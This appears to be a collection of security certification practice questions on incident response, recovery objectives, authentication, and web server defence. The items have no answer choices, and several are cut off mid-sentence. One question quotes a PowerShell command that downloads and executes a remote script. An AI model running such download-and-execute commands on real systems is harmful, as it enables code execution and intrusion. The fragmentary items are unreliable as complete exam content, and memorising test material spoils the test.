A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who
are no longer with the organization. The legal department provided the security team with a list of search terms to
This is an example of:
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to
investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following is the NEXT step of the incident response plan?
An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During
the last two holiday seasons, the server experienced performance issues because of too many connections, and several
customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this
kind of performance issue.
Which of the following is the MOST cost-effective solution?
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server.
During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell IEX(New-Object Net.WebClient).DownloadString (https://content.comptia.org/casp/whois.psl);whois
Which of the following security controls would have alerted and prevented the next phase of the attack?
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security
program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?
An organization is implementing a new identity and access management architecture with the following objectives:
Supporting MFA against on-premises infrastructure
Improving the user experience by integrating with SaaS applications
Applying risk-based policies based on location Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements?
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that
an important legacy embedded system gathers SNMP information from various devices. The system can only be managed
through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the
Which of the following should the security administrator do to mitigate the risk?
Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel
were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last
backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data
classification is 24 hours.
Based on RPO requirements, which of the following recommendations should the management team make?
A security analyst discovered that the companys WAF was not properly configured. The main web server was breached,
and the following payload was found in one of the malicious requests:
Which of the following would BEST mitigate this vulnerability?